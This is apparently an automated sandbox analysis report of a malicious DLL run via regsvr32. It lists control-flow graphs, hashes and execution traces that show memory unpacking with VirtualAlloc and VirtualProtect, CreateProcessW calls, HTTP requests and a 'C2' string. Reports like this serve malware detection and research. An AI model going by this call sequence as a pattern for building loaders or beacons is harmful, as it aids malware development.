108 1309be-1309bf 97->108 98->108 99->70 114 1309a6-1309aa 100->114 115 1309ac-1309bb 100->115 109 130983-130987 101->109 110 130989-13098b 101->110 111 1306b6-1306ba 102->111 112 130692-1306a3 103->112 113 1306a5-1306a9 103->113 104->73 105->90 106 130a29-130a35 105->106 106->105 107->93 122 1309c5-1309cb 108->122 109->108 110->100 120 13098d-13098f 110->120 111->99 112->111 113->99 121 1306ab-1306b3 113->121 114->108 115->108 123 1308ea-1308fe 116->123 124 1308d3-1308e5 117->124 125 1308ca-1308d1 117->125 129 130991-130997 120->129 130 130999-1309a0 120->130 121->111 131 1309d9-1309e9 VirtualProtect 122->131 132 1309cd-1309d3 122->132 123->95 138 130900-130905 123->138 124->123 125->124 125->125 134 1307e3-1307f0 127->134 135 1307db-1307e1 127->135 136 130844-130850 128->136 137 13083b 128->137 129->108 130->122 131->77 132->131 140 1307f2-1307f9 134->140 141 1307fb-13080d 134->141 139 130812-13082c 135->139 136->92 142 130856-130857 136->142 137->136 138->96 139->128 144 13082e-130833 139->144 140->140 140->141 141->139 142->81 144->127
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1248664506.0000000000130000.00000040.00001000.00020000.00000000.sdmp, Offset: 00130000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_130000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 2313188843-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: c3ad375b28d4005cd65bc3de3fd702d44b77b28fe8b76393b77b528eb6f720f0
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: CF72D470618B488FDB2ADF18C8956B9B7E1FB98305F10462DE8CAD7211DB34D986CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 511 1800248b0-18002490f call 18001feb0 514 180024914 511->514 515 180024916-18002491b 514->515 516 180024921-180024926 515->516 517 180024e2c-180024e96 call 18002a534 515->517 519 180024b7b-180024ba7 516->519 520 18002492c-180024931 516->520 525 180024e9b-180024e9d 517->525 523 180024e0d-180024e22 519->523 524 180024bad-180024bb2 519->524 521 180024937-18002493c 520->521 522 180024b6d-180024b76 520->522 526 180024942-180024947 521->526 527 180024ec7-180024f09 call 18001ce90 521->527 522->515 523->517 528 180024bd3-180024bd5 524->528 529 180024bb4-180024bbb 524->529 530 180024ea9-180024eb6 525->530 531 180024e9f-180024ea4 525->531 532 180024a99-180024b44 call 18001fa00 526->532 533 18002494d-180024952 526->533 545 180024f0e-180024f26 527->545 535 180024bc9-180024bce 528->535 537 180024bd7-180024da0 call 180020aa0 call 180022520 call 1800248b0 528->537 529->535 536 180024bbd-180024bc1 529->536 539 180024ebb-180024ec0 530->539 538 180024b5b-180024b68 531->538 549 180024b49-180024b50 532->549 533->539 541 180024958-180024a94 call 1800234d8 call 180001400 call 180029480 533->541 535->515 536->528 542 180024bc3-180024bc7 536->542 558 180024da5-180024e08 call 180029480 537->558 538->515 544 180024ec2 539->544 539->545 541->514 542->528 542->535 544->515 549->545 552 180024b56 549->552 552->538 558->535
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: O}$X$bW
                                                                    • API String ID: 0-980370356
                                                                    • Opcode ID: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                                    • Instruction ID: a62d154362f2d503ef0efb6b3a203e4a1ee478d45050cbe1ab820923c54e17f6
                                                                    • Opcode Fuzzy Hash: e18e412b8bd09892e521a5e3965d89a97fc604b3097fc8c53db2340d1ed33825
                                                                    • Instruction Fuzzy Hash: AA02F4715087C88BD799CFA8C48A69EFBE1FB98744F104A1DF4868B260D7F4D949CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 562 180006b24-180006b65 563 180006b67-180006b6c 562->563 564 180006b72-180006b77 563->564 565 180006da8-180006e6a call 180029374 563->565 566 180006b79-180006b7e 564->566 567 180006b8b-180006c09 call 180008900 564->567 573 180006e76-180006e7a 565->573 574 180006e6c-180006e71 565->574 569 180006b84-180006b89 566->569 570 180006e7f-180006e84 566->570 575 180006c0e-180006c13 567->575 569->563 570->563 576 180006e8a-180006e8d 570->576 573->570 577 180006d9a-180006da3 574->577 578 180006c19-180006c1e 575->578 579 180006e8f-180006f04 call 180024104 575->579 576->579 580 180006f06-180006f0d 576->580 577->563 578->576 582 180006c24-180006c29 578->582 581 180006f11-180006f2b 579->581 580->581 582->577 585 180006c2f-180006cef call 180029374 582->585 585->576 588 180006cf5-180006d94 call 18002071c call 180024104 585->588 588->576 588->577
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "Gd$C2$HG
                                                                    • API String ID: 0-142661339
                                                                    • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                    • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                                    • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                                    • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $!$e##
                                                                    • API String ID: 0-2900154246
                                                                    • Opcode ID: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                                    • Instruction ID: 216da8bcfa57d9aa83ad41f20fe658cab1eb670466840fb7186bd91b9371edf3
                                                                    • Opcode Fuzzy Hash: c6b9a8fabe697f5b2ca67d9c03e63fc4ca39ad07d0e3d1e241ff45a68ef3815c
                                                                    • Instruction Fuzzy Hash: 7B8190705187889BD7E8DF14C4C979EBBE1FB98344F905A1CF89A8B261CB74C948CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 403 18002446c-1800244c1 call 18001feb0 406 1800244c7-180024552 call 180026974 403->406 407 180024558-18002456e InternetOpenW 403->407 406->407
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InternetOpen
                                                                    • String ID: &J@$Va$Z*
                                                                    • API String ID: 2038078732-1197100596
                                                                    • Opcode ID: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                                    • Instruction ID: 28a15b3c09fe6a2aa9f5eb42736a691d582ff290fd3432c8dba93e18a197623f
                                                                    • Opcode Fuzzy Hash: 66813e264fa1cc35a44db824818c230c237c196eb5c6617bb8c0918fb9f82c0e
                                                                    • Instruction Fuzzy Hash: 8A212F715187898FD3A8DF28C0493ABB7E1FB98319F408A1DE4CAC6391DB799448CB06
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 646 18001bf0c-18001bfb0 call 18001feb0 649 18001bfb2-18001c02b call 180026974 646->649 650 18001c031-18001c063 CreateFileW 646->650 649->650
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID: `/
                                                                    • API String ID: 823142352-1163903809
                                                                    • Opcode ID: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                                    • Instruction ID: f11eb3e7a352e1f1819d3b1e5829977cbaca57bf71308e5d5317c3bcacfeb84e
                                                                    • Opcode Fuzzy Hash: 9329703c180bff9c13a57ad2c9d4e17d6ae624210817fa9d3c733bf06a68d3a6
                                                                    • Instruction Fuzzy Hash: 6C3137B061CB848FD364DF18D48579ABBE0FB88314F504A2EE88DC3362DB749845CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ConnectInternet
                                                                    • String ID:
                                                                    • API String ID: 3050416762-0
                                                                    • Opcode ID: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                                    • Instruction ID: 6bd4319daaf70d9cfa93cd172db4ac0144cd1887b423fd46bbb7d9a578168b32
                                                                    • Opcode Fuzzy Hash: 696bad1b1d1373c4a188d8be72565791f44f69a250ba4c3bd44038e3e2a3a9cf
                                                                    • Instruction Fuzzy Hash: 8C41F7705087848FC7B8DF58D48579ABBE0FB98315F108A5EE48DD7361DB749884CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InformationVolume
                                                                    • String ID:
                                                                    • API String ID: 2039140958-0
                                                                    • Opcode ID: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                                    • Instruction ID: e87697cfd510fd4059a611545946932b1d04e28e1a34b551021fd5cd6805f499
                                                                    • Opcode Fuzzy Hash: 1949fae2aaba8b4119d5023be7d4790b480e02f5c580bad52ddd601b650acc4f
                                                                    • Instruction Fuzzy Hash: AB31E770618B888FD7B8CF68D4857AAB7E1FB89315F508A1EE48DC7251CB749845CB43
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HttpOpenRequest
                                                                    • String ID:
                                                                    • API String ID: 1984915467-0
                                                                    • Opcode ID: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                                    • Instruction ID: c8d36c456ba033a28ec6fbd746a54a3663befea28eedef4c15a9fc959fe4c155
                                                                    • Opcode Fuzzy Hash: 2abca7ab27ce1f38676343e57d0af3d26f331b1f8e41c5eb7387a3a1acb3ccf2
                                                                    • Instruction Fuzzy Hash: D331607050CB848BE7B4DF08D4C9B9AB7E0FB98315F108A4DE48DD7296CB789484CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread
                                                                    • String ID:
                                                                    • API String ID: 2422867632-0
                                                                    • Opcode ID: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                                    • Instruction ID: 87f7a9be59381a5b3d954798ed335bb6745bcd8ebd0cdd375d804fe942fcfa66
                                                                    • Opcode Fuzzy Hash: 43f2add25367f37c20804a12f5309876908a740bd4f725cbfb4cce081a5c4e54
                                                                    • Instruction Fuzzy Hash: 7A312B7160CB848FDBA8DF18E48579AB7E1FB98314F10465EE88CC7396DB309984CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:6.7%
                                                                    Dynamic/Decrypted Code Coverage:2.5%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:1874
                                                                    Total number of Limit Nodes:40
                                                                    execution_graph 18090 7fef74fc990 18094 7fef74f4980 18090->18094 18092 7fef74fc9b8 EncodePointer 18093 7fef74fc9e5 18092->18093 18095 7fef74f49cb _calloc_dbg_impl 18094->18095 18095->18092 16679 7fef7505393 16680 7fef75053a0 16679->16680 16681 7fef75053b4 __SehTransFilter 16680->16681 16682 7fef75053cc 16680->16682 16688 7fef75054a0 RaiseException 16681->16688 16689 7fef75054a0 RaiseException 16682->16689 16684 7fef75053ca 16690 7fef74fed30 16684->16690 16687 7fef75053e1 _IsExceptionObjectToBeDestroyed __SehTransFilter 16688->16684 16689->16684 16691 7fef74fed3e 16690->16691 16693 7fef74fed4c 16691->16693 16696 7fef74fcf80 DecodePointer 16691->16696 16694 7fef74fed88 16693->16694 16695 7fef74fcf80 _inconsistency 36 API calls 16693->16695 16694->16687 16695->16694 16697 7fef74fcf9e 16696->16697 16700 7fef74fcf50 16697->16700 16701 7fef74fcf59 16700->16701 16704 7fef75039e0 16701->16704 16705 7fef75039fa 16704->16705 16714 7fef74fd430 DecodePointer 16705->16714 16707 7fef7503a09 16708 7fef7503a20 16707->16708 16715 7fef74fcff0 16707->16715 16710 7fef7503a42 16708->16710 16711 7fef74fbe50 terminate 14 API calls 16708->16711 16727 7fef74f7090 16710->16727 16711->16710 16714->16707 16716 7fef74fd02a 16715->16716 16717 7fef74fd1d8 DecodePointer 16716->16717 16718 7fef74fd19a 16716->16718 16719 7fef74fd1e8 16717->16719 16720 7fef74fbd70 _invalid_parameter 17 API calls 16718->16720 16721 7fef74f7090 _exit 33 API calls 16719->16721 16722 7fef74fd209 16719->16722 16726 7fef74fd1ce 16719->16726 16720->16726 16721->16722 16724 7fef74fd289 16722->16724 16730 7fef74f3d00 RtlEncodePointer 16722->16730 16724->16726 16731 7fef74f9360 LeaveCriticalSection 16724->16731 16726->16708 16728 7fef74f7280 _exit 33 API calls 16727->16728 16729 7fef74f70a9 16728->16729 16729->16693 16730->16724 16731->16726 17604 7fef7502695 17605 7fef75026a0 17604->17605 17606 7fef74fbd70 _invalid_parameter 17 API calls 17605->17606 17607 7fef75026ab 17605->17607 17606->17607 17608 7fef7504a95 17610 7fef7504aad __SehTransFilter 17608->17610 17609 7fef7504c2b 17610->17609 17611 7fef7505180 __SehTransFilter 38 API calls 17610->17611 17611->17609 18566 180024ee6 18567 180024f52 18566->18567 18568 180024eea 18566->18568 18569 18002506a CreateProcessW 18567->18569 16489 7fef74f4399 16490 7fef74f43a6 16489->16490 16492 7fef74f4377 16489->16492 16492->16489 16492->16490 16493 7fef74fabb0 DecodePointer 16492->16493 16494 7fef74fabd3 16493->16494 16494->16492 16495 7fef74f3599 16498 7fef74f8900 16495->16498 16497 7fef74f359e 16499 7fef74f8936 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 16498->16499 16500 7fef74f8920 16498->16500 16501 7fef74f89de 16499->16501 16500->16497 16501->16500 16507 1800178f4 16510 18000ffc0 16507->16510 16509 180017924 16513 18001000e 16510->16513 16511 180011bd0 16522 1800053b0 16511->16522 16513->16511 16515 1800116b2 16513->16515 16516 18001667c 16513->16516 16515->16509 16519 1800166ac 16516->16519 16520 180016ad3 16519->16520 16526 180023624 16519->16526 16530 18000bc98 16519->16530 16534 1800270c0 16519->16534 16520->16513 16524 1800053e0 16522->16524 16523 18001a10c CreateProcessW 16525 18000598b 16523->16525 16524->16523 16524->16525 16525->16515 16529 180023662 16526->16529 16528 1800237ae 16528->16519 16529->16528 16538 18001a10c 16529->16538 16533 18000bcde 16530->16533 16531 18001a10c CreateProcessW 16532 18000c521 16531->16532 16532->16519 16533->16531 16533->16532 16537 180027157 16534->16537 16535 180027fe1 16535->16519 16536 18001a10c CreateProcessW 16536->16537 16537->16535 16537->16536 16539 18001a166 16538->16539 16540 180024f28 CreateProcessW 16539->16540 16541 18001a335 16540->16541 16541->16528 18581 7fef74fc080 HeapValidate 18582 7fef74fc0a2 18581->18582 16650 130000 16651 130183 16650->16651 16652 13043e VirtualAlloc 16651->16652 16655 130462 16652->16655 16653 130531 GetNativeSystemInfo 16654 13056d VirtualAlloc 16653->16654 16656 130a00 16653->16656 16658 13058b 16654->16658 16655->16653 16655->16656 16657 1309d9 VirtualProtect 16657->16658 16658->16656 16658->16657 16658->16658 18109 7fef750b580 18110 7fef750b5fa 18109->18110 18111 7fef750b676 18110->18111 18112 7fef750b6cb 18110->18112 18114 7fef74fbd70 _invalid_parameter 17 API calls 18111->18114 18113 7fef750afb0 _fflush_nolock 17 API calls 18112->18113 18116 7fef750b6fe 18112->18116 18113->18116 18120 7fef750b6aa _LocaleUpdate::~_LocaleUpdate 18114->18120 18115 7fef750b84d 18117 7fef74fbd70 _invalid_parameter 17 API calls 18115->18117 18116->18115 18118 7fef750b8a2 18116->18118 18117->18120 18119 7fef750b915 18118->18119 18126 7fef750b96a 18118->18126 18123 7fef74fbd70 _invalid_parameter 17 API calls 18119->18123 18121 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18120->18121 18122 7fef750cd90 18121->18122 18123->18120 18124 7fef750cc93 18124->18120 18125 7fef74fbd70 _invalid_parameter 17 API calls 18124->18125 18125->18120 18126->18124 18127 7fef750bada 18126->18127 18128 7fef74fbd70 _invalid_parameter 17 API calls 18127->18128 18128->18120 16736 7fef750df8d 16738 7fef750dfbb 16736->16738 16737 7fef750eadf 16763 7fef750ef10 16737->16763 16738->16737 16744 7fef750da75 16738->16744 16759 7fef750eec0 16738->16759 16741 7fef750eafd 16742 7fef750eb33 16741->16742 16746 7fef750eec0 25 API calls 16741->16746 16743 7fef750ec29 16742->16743 16758 7fef750eb49 _CrtMemDumpAllObjectsSince 16742->16758 16745 7fef750ef10 25 API calls 16743->16745 16748 7fef750eca1 16744->16748 16751 7fef750dbb5 16744->16751 16747 7fef750ebda 16745->16747 16746->16742 16747->16744 16752 7fef750eec0 25 API calls 16747->16752 16749 7fef750dbe9 _LocaleUpdate::~_LocaleUpdate 16748->16749 16750 7fef74fbd70 _invalid_parameter 17 API calls 16748->16750 16753 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16749->16753 16750->16749 16755 7fef74fbd70 _invalid_parameter 17 API calls 16751->16755 16752->16744 16754 7fef750ed9e 16753->16754 16755->16749 16758->16747 16767 7fef750f000 16758->16767 16774 7fef750ee40 16758->16774 16762 7fef750eed7 16759->16762 16760 7fef750ee40 25 API calls 16760->16762 16761 7fef750ef07 16761->16737 16762->16760 16762->16761 16765 7fef750ef2c 16763->16765 16764 7fef750ef4d 16764->16741 16765->16764 16766 7fef750ee40 25 API calls 16765->16766 16766->16765 16768 7fef750f026 _CrtMemDumpAllObjectsSince wcsxfrm 16767->16768 16770 7fef750f031 _CrtMemDumpAllObjectsSince _LocaleUpdate::~_LocaleUpdate 16767->16770 16769 7fef750f146 _CrtMemDumpAllObjectsSince 16768->16769 16768->16770 16771 7fef750f276 _CrtMemDumpAllObjectsSince 16768->16771 16769->16770 16773 7fef750f1b5 MultiByteToWideChar 16769->16773 16770->16758 16772 7fef750f29d MultiByteToWideChar 16771->16772 16772->16770 16773->16770 16775 7fef750ee62 16774->16775 16777 7fef750ee6e 16775->16777 16778 7fef750f360 16775->16778 16777->16758 16779 7fef750f399 16778->16779 16812 7fef750f622 16778->16812 16813 7fef750afb0 16779->16813 16780 7fef750f4f2 16784 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16780->16784 16782 7fef7510170 23 API calls 16782->16780 16786 7fef750f7c5 16784->16786 16785 7fef750f3ed 16789 7fef750f4c7 16785->16789 16790 7fef750afb0 _fflush_nolock 17 API calls 16785->16790 16786->16777 16787 7fef750afb0 _fflush_nolock 17 API calls 16788 7fef750f3b8 16787->16788 16788->16785 16791 7fef750afb0 _fflush_nolock 17 API calls 16788->16791 16789->16780 16817 7fef7510170 16789->16817 16793 7fef750f43d 16790->16793 16794 7fef750f3ca 16791->16794 16795 7fef750f484 16793->16795 16797 7fef750afb0 _fflush_nolock 17 API calls 16793->16797 16796 7fef750afb0 _fflush_nolock 17 API calls 16794->16796 16795->16789 16798 7fef750f561 16795->16798 16796->16785 16799 7fef750f44f 16797->16799 16800 7fef750afb0 _fflush_nolock 17 API calls 16798->16800 16799->16795 16802 7fef750afb0 _fflush_nolock 17 API calls 16799->16802 16801 7fef750f56e 16800->16801 16804 7fef750f5b8 16801->16804 16806 7fef750afb0 _fflush_nolock 17 API calls 16801->16806 16803 7fef750f461 16802->16803 16805 7fef750afb0 _fflush_nolock 17 API calls 16803->16805 16804->16812 16825 7fef750b530 16804->16825 16805->16795 16807 7fef750f580 16806->16807 16807->16804 16809 7fef750afb0 _fflush_nolock 17 API calls 16807->16809 16810 7fef750f592 16809->16810 16811 7fef750afb0 _fflush_nolock 17 API calls 16810->16811 16811->16804 16812->16780 16812->16782 16815 7fef750afc1 16813->16815 16814 7fef750b04b 16814->16785 16814->16787 16815->16814 16816 7fef74fbd70 _invalid_parameter 17 API calls 16815->16816 16816->16814 16818 7fef7510185 16817->16818 16819 7fef750afb0 _fflush_nolock 17 API calls 16818->16819 16821 7fef75101c7 16819->16821 16820 7fef75101dc 16820->16780 16821->16820 16823 7fef7510326 16821->16823 16828 7fef750ab10 16821->16828 16823->16820 16832 7fef7509290 16823->16832 16869 7fef750b090 16825->16869 16827 7fef750b56c 16827->16812 16829 7fef750ab23 16828->16829 16830 7fef750ab35 16828->16830 16829->16823 16830->16829 16831 7fef74fbd70 _invalid_parameter 17 API calls 16830->16831 16831->16829 16833 7fef75092b6 __doserrno 16832->16833 16834 7fef75092d8 16832->16834 16833->16820 16835 7fef7509341 __doserrno 16834->16835 16836 7fef750938c 16834->16836 16839 7fef74fbd70 _invalid_parameter 17 API calls 16835->16839 16837 7fef7509410 __doserrno 16836->16837 16838 7fef750945b 16836->16838 16843 7fef74fbd70 _invalid_parameter 17 API calls 16837->16843 16846 7fef750fae0 16838->16846 16839->16833 16843->16833 16844 7fef75094a6 __doserrno 16860 7fef750fbc0 LeaveCriticalSection 16844->16860 16847 7fef750fb25 16846->16847 16848 7fef750fb7a 16846->16848 16851 7fef750fb56 16847->16851 16852 7fef750fb3b InitializeCriticalSectionAndSpinCount 16847->16852 16849 7fef7509464 16848->16849 16850 7fef750fb81 EnterCriticalSection 16848->16850 16849->16844 16854 7fef7509520 16849->16854 16850->16849 16861 7fef74f9360 LeaveCriticalSection 16851->16861 16852->16851 16862 7fef750f900 16854->16862 16856 7fef7509545 16857 7fef750959d SetFilePointer 16856->16857 16859 7fef7509552 _dosmaperr 16856->16859 16858 7fef75095c1 GetLastError 16857->16858 16857->16859 16858->16859 16859->16844 16860->16833 16861->16848 16863 7fef750f935 16862->16863 16865 7fef750f913 __doserrno 16862->16865 16864 7fef750f99e __doserrno 16863->16864 16867 7fef750f9e9 __doserrno 16863->16867 16866 7fef74fbd70 _invalid_parameter 17 API calls 16864->16866 16865->16856 16866->16865 16867->16865 16868 7fef74fbd70 _invalid_parameter 17 API calls 16867->16868 16868->16865 16870 7fef750b0b7 16869->16870 16871 7fef750b168 16870->16871 16873 7fef750b1a6 _CrtMemDumpAllObjectsSince 16870->16873 16878 7fef750b0c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 16870->16878 16872 7fef74fbd70 _invalid_parameter 17 API calls 16871->16872 16872->16878 16874 7fef750b347 _CrtMemDumpAllObjectsSince 16873->16874 16879 7fef750b1cf 16873->16879 16875 7fef750b359 WideCharToMultiByte 16874->16875 16876 7fef750b3ab 16875->16876 16877 7fef750b3c1 GetLastError 16876->16877 16876->16878 16877->16878 16881 7fef750b3d0 _calloc_dbg_impl 16877->16881 16878->16827 16879->16878 16880 7fef74fbd70 _invalid_parameter 17 API calls 16879->16880 16880->16878 16881->16878 16882 7fef74fbd70 _invalid_parameter 17 API calls 16881->16882 16882->16878 18583 7fef74f10b0 18584 7fef74f10da 18583->18584 18585 7fef74f10fc 18584->18585 18586 7fef74f1000 4 API calls 18584->18586 18587 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18585->18587 18586->18585 18588 7fef74f112c 18587->18588 16482 18001a10c 16483 18001a166 16482->16483 16486 180024f28 16483->16486 16485 18001a335 16487 180024fcb 16486->16487 16488 18002506a CreateProcessW 16487->16488 16488->16485 16883 7fef7509fba 16892 7fef7509c4d 16883->16892 16884 7fef750a06d WriteFile 16885 7fef750a103 GetLastError 16884->16885 16884->16892 16887 7fef7509dd9 _dosmaperr __doserrno 16885->16887 16886 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16889 7fef750a9f5 16886->16889 16887->16886 16888 7fef7509f66 WideCharToMultiByte 16888->16887 16890 7fef7509fbf WriteFile 16888->16890 16891 7fef750a050 GetLastError 16890->16891 16890->16892 16891->16887 16891->16892 16892->16884 16892->16887 16892->16888 16893 7fef750fc00 WriteConsoleW CreateFileW _putwch_nolock 16892->16893 16894 7fef750a158 GetLastError 16892->16894 16895 7fef750f330 MultiByteToWideChar MultiByteToWideChar wcsxfrm 16892->16895 16896 7fef750a1b5 GetLastError 16892->16896 16893->16892 16894->16887 16895->16892 16896->16887 18593 7fef750bcbd 18594 7fef750b99c 18593->18594 18595 7fef750cc93 18594->18595 18597 7fef750bada 18594->18597 18596 7fef74fbd70 _invalid_parameter 17 API calls 18595->18596 18601 7fef750bb0e _LocaleUpdate::~_LocaleUpdate 18595->18601 18596->18601 18600 7fef74fbd70 _invalid_parameter 17 API calls 18597->18600 18598 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 18599 7fef750cd90 18598->18599 18600->18601 18601->18598 18602 7fef7502c9f 18603 7fef7502caf 18602->18603 18604 7fef7502ca6 18602->18604 18604->18603 18605 7fef74fbd70 _invalid_parameter 17 API calls 18604->18605 18605->18603 18606 7fef750809f 18607 7fef75080b0 _calloc_dbg_impl 18606->18607 18608 7fef7508145 _calloc_dbg_impl 18606->18608 18608->18607 18609 7fef74fbd70 _invalid_parameter 17 API calls 18608->18609 18609->18607 16905 7fef750a7a0 16908 7fef750a61f 16905->16908 16906 7fef750a726 WideCharToMultiByte 16907 7fef750a791 GetLastError 16906->16907 16906->16908 16910 7fef750a887 _dosmaperr __doserrno 16907->16910 16908->16906 16909 7fef750a7b0 WriteFile 16908->16909 16908->16910 16909->16908 16912 7fef750a857 GetLastError 16909->16912 16911 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16910->16911 16913 7fef750a9f5 16911->16913 16912->16908 16674 7fef74faca8 16675 7fef74facb2 16674->16675 16676 7fef74f74e0 __crtExitProcess 3 API calls 16675->16676 16677 7fef74facbc RtlAllocateHeap 16676->16677 16918 7fef74f3faa 16919 7fef74f3e30 LeaveCriticalSection 16918->16919 16920 7fef74f3fb6 GetCurrentThreadId 16919->16920 16921 7fef74f3fea SetLastError 16920->16921 18627 7fef74f5cad 18630 7fef74f5cb8 18627->18630 18629 7fef74f6201 18631 7fef74f5e1a _realloc_dbg 18630->18631 18632 7fef74f9360 LeaveCriticalSection 18630->18632 18632->18629 16949 7fef74fcb4f 16954 7fef74fcb5c 16949->16954 16950 7fef74f3280 _CrtMemDumpAllObjectsSince_stat 8 API calls 16951 7fef74fcf0f 16950->16951 16952 7fef74fcbeb GetStdHandle 16953 7fef74fcc94 